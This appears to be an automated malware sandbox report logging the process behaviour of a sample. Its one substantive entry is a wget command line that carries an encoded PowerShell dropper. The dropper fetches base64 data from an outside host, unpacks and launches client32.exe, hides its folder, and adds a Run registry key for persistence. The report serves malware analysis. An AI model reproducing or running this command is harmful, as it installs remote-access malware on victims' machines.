Show Windows behavior

Mutex Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

General

Target ID:2
Start time:17:28:14
Start date:25/03/2024
Path:C:\Windows\SysWOW64\wget.exe
Wow64 process (32bit):true
Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;"
Imagebase:0x400000
File size:3'895'184 bytes
MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true
Show Windows behavior

File Activities

Show Windows behavior

Section Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Disassembly

No disassembly